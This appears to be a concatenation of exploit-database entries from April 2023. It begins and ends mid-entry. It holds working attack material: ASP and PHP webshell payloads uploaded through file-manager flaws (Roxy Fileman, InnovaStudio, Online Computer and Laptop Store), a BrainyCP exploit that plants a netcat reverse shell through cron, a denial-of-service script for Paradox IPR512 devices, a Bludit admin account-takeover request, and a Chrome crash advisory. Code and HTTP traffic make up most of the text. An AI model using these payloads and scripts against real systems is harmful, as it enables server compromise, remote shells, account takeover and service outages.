------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="action" upload ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="method" ajax ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="d" /Upload/PenTest ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="files[]"; filename="test.jpg" Content-Type: image/jpeg ‰PNG <%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> <%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%> ------WebKitFormBoundarygOxjsc2hpmwmISeJ-- ########################################################################################## # In the second stage, we manipulate the .jpg file that we uploaded to the server. # ########################################################################################## { "FILES_ROOT": "", "RETURN_URL_PREFIX": "", "SESSION_PATH_KEY": "", "THUMBS_VIEW_WIDTH": "140", "THUMBS_VIEW_HEIGHT": "120", "PREVIEW_THUMB_WIDTH": "300", "PREVIEW_THUMB_HEIGHT":"200", "MAX_IMAGE_WIDTH": "1000", "MAX_IMAGE_HEIGHT": "1000", "INTEGRATION": "ckeditor", "DIRLIST": "asp_net/main.ashx?a=DIRLIST", "CREATEDIR": "asp_net/main.ashx?a=CREATEDIR", "DELETEDIR": "asp_net/main.ashx?a=DELETEDIR", "MOVEDIR": "asp_net/main.ashx?a=MOVEDIR", "COPYDIR": "asp_net/main.ashx?a=COPYDIR", "RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR", "FILESLIST": "asp_net/main.ashx?a=FILESLIST", "UPLOAD": "asp_net/main.ashx?a=UPLOAD", "DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD", "DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR", "DELETEFILE": "asp_net/main.ashx?a=DELETEFILE", "MOVEFILE": "asp_net/main.ashx?a=MOVEFILE", "COPYFILE": "asp_net/main.ashx?a=COPYFILE", "RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE", "GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB", "DEFAULTVIEW": "list", "FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess", "ALLOWED_UPLOADS": "bmp gif png jpg jpeg", "FILEPERMISSIONS": "0644", "DIRPERMISSIONS": "0755", "LANG": "auto", "DATEFORMAT": "dd/MM/yyyy HH:mm", "OPEN_LAST_DIR": "yes" } ############################################################################################################################################################################################################################ # We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows. # ############################################################################################################################################################################################################################ POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 44 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx =========================================================================================================================================================================================================================== POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 68 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx ########################################################################################## # and it's done! # ########################################################################################## HTTP/2 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/10.0 X-Aspnet-Version: 4.0.30319 X-Powered-By-Plesk: PleskWin Date: Sun, 09 Apr 2023 09:49:34 GMT Content-Length: 21 {"res":"ok","msg":""} =============================================================================================

#!/bin/bash # Exploit Title: Paradox Security Systems IPR512 - Denial Of Service # Google Dork: intitle:"ipr512 * - login screen" # Date: 09-APR-2023 # Exploit Author: Giorgi Dograshvili # Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423) # Version: IPR512 # CVE : CVE-2023-24709 # Function to display banner message display_banner() { echo "******************************************************" echo "* *" echo "* PoC CVE-2023-24709 *" echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *" echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *" echo "* by SlashXzerozero *" echo "* *" echo "******************************************************" } # Call the function to display the banner display_banner echo "" echo "" echo "Please enter a domain name or IP address with or without port" read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain # Step 2: Ask for user confirmation read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm if [[ $confirm == "Y" || $confirm == "y" ]]; then # Display loading animation animation=("|" "/" "-" "\\") index=0 while [[ $index -lt 10 ]]; do echo -ne "Loading ${animation[index]} \r" sleep 1 index=$((index + 1)) done # Use curl to send HTTP GET request with custom headers and timeout response=$(curl -i -s -k -X GET \ -H "Host: $domain" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \ -H "Accept: */" \ -H "Referer: http://$domain/login.html" \ -H "Accept-Encoding: gzip, deflate" \ -H "Accept-Language: en-US,en;q=0.9" \ -H "Connection: close" \ --max-time 10 \ "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982") # Check response for HTTP status code 200 and print result if [[ $response == *"HTTP/1.1 200 OK"* ]]; then echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html" else echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html" fi else echo "The script is stopped!." fi

# Exploit Title: BrainyCP V1.0 - Remote Code Execution # Date: 2023-04-03 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://brainycp.io # Demo: https://demo.brainycp.io # Tested on: Kali Linux # CVE : N/A import requests # credentials url = input("URL: ") username = input("Username: ") password = input("Password: ") ip = input("IP: ") port = input("Port: ") # login session = requests.Session() login_url = f"{url}/auth.php" login_data = {"login": username, "password": password, "lan": "/"} response = session.post(login_url, data=login_data) if "Sign In" in response.text: print("[-] Wrong credentials or may the system patched.") exit() # reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash" # request add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron" add_cron_data = { "cron_freq_minutes": "*", "cron_freq_minutes_own": "", "cron_freq_hours": "*", "cron_freq_hours_own": "", "cron_freq_days": "*", "cron_freq_days_own": "", "cron_freq_months": "*", "cron_freq_weekdays": "*", "cron_command": reverse_shell, "cron_user": username, } response = session.post(add_cron_url, data=add_cron_data) print("[+] Check your listener!")

#!/usr/bin/env python3 # Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) # Date: 09/04/2023 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip # Version: 1.0 # Tested on: Debian 11.6 # CVE : CVE-2023-1826 # Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. import requests from argparse import ArgumentParser from uuid import uuid4 from datetime import datetime, timezone def interactiveShell(fileUrl: str): print("Entering pseudo-shell. Type 'exit' to quit") while True: command = input("\n$ ") if command == "exit": break response = requests.get(f"{fileUrl}?cmd={command}") print(response.text) def uploadFile(url: str, filename: str, content): endpoint = f"{url}/classes/SystemSettings.php?f=update_settings" file = {"img": (filename, content)} response = requests.post(endpoint, files=file) return response def getUploadedFileUrl(url: str, filename: str): timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes epoch = int(timeNow.timestamp()) # Time in milliseconds possibleFilename = f"{epoch}_{filename}" fileUrl = f"{url}/uploads/{possibleFilename}" response = requests.get(fileUrl) if response.status_code == 200: return fileUrl def exploit(url: str): filename = str(uuid4()) + ".php" content = "<?php system($_GET['cmd'])?>" response = uploadFile(url, filename, content) if response.status_code != 200: print(f"[File Upload] Got status code {response.status_code}. Expected 200.") uploadedUrl = getUploadedFileUrl(url, filename) if uploadedUrl == None: print("Error. Could not find the uploaded file.") exit(1) print(f"Uploaded file is at {uploadedUrl}") try: interactiveShell(uploadedUrl) except KeyboardInterrupt: pass print("\nQuitting.") def getWebsiteURL(url: str): if not url.startswith("http"): url = "http://" + url if url.endswith("/"): url = url[:-1] return url def main(): parser = ArgumentParser(description="Exploit for CVE-2023-1826") parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/") args = parser.parse_args() url = getWebsiteURL(args.url) exploit(url) if __name__ == "__main__": main()

## Title: Microsoft-Edge-(Chromium-based)-Webview2-1.0.1661.34-Spoofing-Vulnerability ## Author: nu11secur1ty ## Date: 04.10.2023 ## Vendor: https://developer.microsoft.com/en-us/ ## Software: https://developer.microsoft.com/en-us/microsoft-edge/webview2/ ## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/ ## CVE ID: CVE-2023-24892 ## Description: The Webview2 development platform is vulnerable to Spoofing attacks. The attacker can build a very malicious web app and spread it to the victim's networks. and when they open it this can be the last web app opening for them. STATUS: HIGH Vulnerability [+]Exploit: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892/PoC) ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892) ## Proof and Exploit: [href](https://streamable.com/uk7l2n) ## Time spend: 03:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover ## Author: nu11secur1ty ## Date: 04.11.2013 ## Vendor: https://www.bludit.com/ ## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2 ## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/ ## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit ## Description: The already authenticated attacker can send a normal request to change his password and then he can use the same JSON `object` and the vulnerable `API token KEY` in the same request to change the admin account password. Then he can access the admin account and he can do very malicious stuff. STATUS: HIGH Vulnerability [+]Exploit: ```PUT PUT /api/users/admin HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 138 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 content-type: application/json Accept: */* Origin: http://127.0.0.1:8000 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8000/admin/edit-user/pwned Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui Connection: close {"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"} ``` [+]Response: ```HTTP HTTP/1.1 200 OK Host: 127.0.0.1:8000 Date: Tue, 11 Apr 2023 08:33:51 GMT Connection: close X-Powered-By: PHP/7.4.30 Access-Control-Allow-Origin: * Content-Type: application/json {"status":"0","message":"User edited.","data":{"key":"admin"}} ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2) ## Proof and Exploit: [href](https://streamable.com/w3aa4d) ## Time spend: 00:57:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS) ## Exploit Author: LiquidWorm Vendor: Google LLC Product web page: https://www.google.com Affected version: 111.0.5563.64 (Official Build) (x86_64) 110.0.5481.100 (Official Build) (x86_64) 108.0.5359.124 (Official Build) (x86_64) 108.0.5359.98 (Official Build) (x86_64) Fixed version: 112.0.5615.49 (Official Build) (x86_64) Summary: Google Chrome browser is a free web browser used for accessing the internet and running web-based applications. The Google Chrome browser is based on the open source Chromium web browser project. Google released Chrome in 2008 and issues several updates a year. Desc: Fatal OOM/crash of Chrome browser while detaching/attaching tabs on macOS. Commit fix: "The original cl landed many months ago, but chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm is the only change that didn't revert cleanly." macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs) Implements accessibility hit testing for RemoteCocoa so that Hover Text and VoiceOver mouse mode can read the accessible objects under the user's pointer. Cross-process plumbing was needed because RemoteCocoa bridges to native controls in a separate app shim process and must report accessibility trees from the browser process via the undocumented NSAccessibilityRemoteUIElement mechanism. This CL does the following: 1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES in the browser process. This enables the browser process to accept redirected accessibilityHitTest calls to the object corresponding to any NSAccessibilityRemoteUIElement returned by the original accessibilityHitTest at the app shim process. 2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's accessibilityHitTest to have a custom implementation with NSAccessibilityRemoteUIElement support so that custom window controls can be found. Additionally, adjusts the BrowserView bounds so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't support view targeting) can return controls in the web app frame toolbar. 3. (For Web Content) Implements RenderWidgetHostViewCocoa's accessibilityHitTest for instances in the app shim to return a NSAccessibilityRemoteUIElement corresponding to their counterparts in the browser process so that web content objects can be found. Tested on: macOS 12.6.1 (Monterey) macOS 13.3.1 (Ventura) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5770 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php 08.12.2022 -- UI PoC: ------- 1. Grab a tab and detach it. 2. Bring back the tab. 3. Do this 2-3 times attaching / re-attaching the tab. 4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes. 5. Process crashes entirely. Ref: Issue 1400682 (Ticket created: Dec 13, 2022) Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682 Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171 Ref: axtester.mm terminal PoC by [email protected] (https://bugs.chromium.org/u/161486905) ============= // // Copyright (c) Microsoft Corporation. All rights reserved. // #include <ApplicationServices/ApplicationServices.h> #include <iostream> #include <sstream> #include <vector> __BEGIN_DECLS // NOLINTNEXTLINE AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *); // NOLINTNEXTLINE CFTypeID AXTextMarkerGetTypeID(); __END_DECLS std::ostream& bold_on(std::ostream& os) { if (isatty(STDOUT_FILENO)) { return os << "\e[1m"; } return os; } std::ostream& bold_off(std::ostream& os) { if (isatty(STDOUT_FILENO)) { return os << "\e[0m"; } return os; } std::string from_cfstr(CFTypeRef cf_ref) { if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID()) { const auto cf_str = static_cast<CFStringRef>(cf_ref); const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding( CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1; auto result = std::string(max_length, '\0'); if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8)) { if (const auto pos = result.find('\0'); pos != std::string::npos) { result.resize(pos); } return result; } } return {}; } std::string ax_element_id(AXUIElementRef value) { // AX element cache - AX elements are backed by CFData // (referring to 'remote' AX objects) and this data is // 'stable' across 'volatile' instances of AXUIElement. // 'hash and equality' of AX elements are based on this // data and therefore, we can use AXUIElement objects as // 'keys' in a dictionary with values, identifying these // objects (uniquely). const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); auto ax_id = CFDictionaryGetValue(ax_elements, value); if (ax_id == nullptr) { if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault)) { if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid)) { CFDictionarySetValue(ax_elements, value, uuid_s); CFRelease(uuid_s); } CFRelease(uuid); } ax_id = CFDictionaryGetValue(ax_elements, value); } return from_cfstr(ax_id); } template <typename T> T ax_attribute_value(AXUIElementRef e, CFStringRef name) { if (e != nullptr) { auto ref = T{}; if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess) { return ref; } } return nullptr; } // NOLINTNEXTLINE void ax_traverse(AXUIElementRef elem, uint32_t depth) { const auto max_depth = 10; if (depth > max_depth) { return; } const auto indent = [&]() { for (auto x = 0; x < depth; x++) { std::cout << " "; } }; auto wid = CGWindowID{}; if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess) { wid = 0; } indent(); const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute); std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) << ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off << std::endl; if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute)) { for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++) { const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx)); ax_traverse(element, depth + 1); } CFRelease(children); } } int main(int argc, char* const argv[]) { auto pid = 0; if (argc > 1) { if (!AXIsProcessTrusted()) { std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl; exit(1); // NOLINT } // NOLINTNEXTLINE pid = std::stoi(argv[1]); } else { std::cerr << "usage: axtester <pid>" << std::endl; exit(1); // NOLINT } if (const auto app = AXUIElementCreateApplication(pid)) { auto observer = AXObserverRef{}; auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx) { auto myapp = (__AXUIElement*)(ctx); auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8); std::cout << "Hint: " << hint << std::endl; ax_traverse(myapp, 0); }, &observer); if (kAXErrorSuccess != ret) { std::cerr << "Fail to create observer" << std::endl; return -1; } std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl; std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl; std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl; std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl; std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl; std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl; std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl; CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode); CFRunLoopRun(); } return 0; } --codeaibot explains-- This is a C++ program that uses the Accessibility API (AX) provided by macOS to traverse the user interface of a running application and print out information about the accessibility elements that it finds. The program takes a single argument, which is the process ID (PID) of the application to examine. If no argument is provided, the program displays a usage message and exits. The main() function first checks if the Terminal app has been granted accessibility privileges by calling the AXIsProcessTrusted() function. If it hasn't, the program displays an error message and exits. If the Terminal app has been granted accessibility privileges, the program creates an AXUIElementRef object for the application using the AXUIElementCreateApplication() function, passing in the PID as an argument. The ax_traverse() function is then called with the root accessibility element of the application as an argument. This function recursively traverses the accessibility tree of the application, printing out information about each element it encounters. The program also defines several helper functions for working with Core Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()), as well as some functions for printing formatted output to the console (bold_on() and bold_off()). -- / -- As this issue is not a security issue nor results in security consequences, this report is not eligible for a VRP reward. ++ Thank you Amy! --

# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal # Date: 11/04/2023 # Exploit Author: Zer0FauLT [[email protected]] # Vendor Homepage: innovastudio.com # Product: Asset Manager # Version: <= Asset Manager ASP Version 5.4 # Tested on: Windows 10 and Windows Server 2019 # CVE : 0DAY ################################################################################################## # # # ASP version, in i_upload_object_FSO.asp, line 234 # # # # oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" # # # ################################################################################################## ||==============================================================================|| || ((((1)))) || || || || ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... || ||==============================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0644 ] " " " " DIR PERMISSIONS : [ 0755 ] " " " " UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " ################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.asp" Content-Type: application/octet-stream <%eval request("#11")%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " ...[ RESPONCE ]... " " " " ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. " " " ================================================================================================== *** ||================================================================================|| || ((((2)))) || || || || ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... || || || ||================================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0644 ] " " " " DIR PERMISSIONS : [ 0755 ] " " " " UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " ################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt" Content-Type: application/octet-stream <%eval request("#11")%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " >>> filename="shell.asp%00asp.txt" <<< " " " " [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode " " " " or " " " " CTRL+Shift+U " " " " SEND! " " " ================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] " " " " SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] " " " ================================================================================================== *** ||==============================================================================|| || ((((3)))) || || || || ...:::NO WRITE PERMISSION!:::... || || || || ...:::Directory Traversal:::... || || || ||==============================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0600 ] " " " " DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] " " " " OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] " " " " DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " " App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] " " " " TEST WORK DIR : 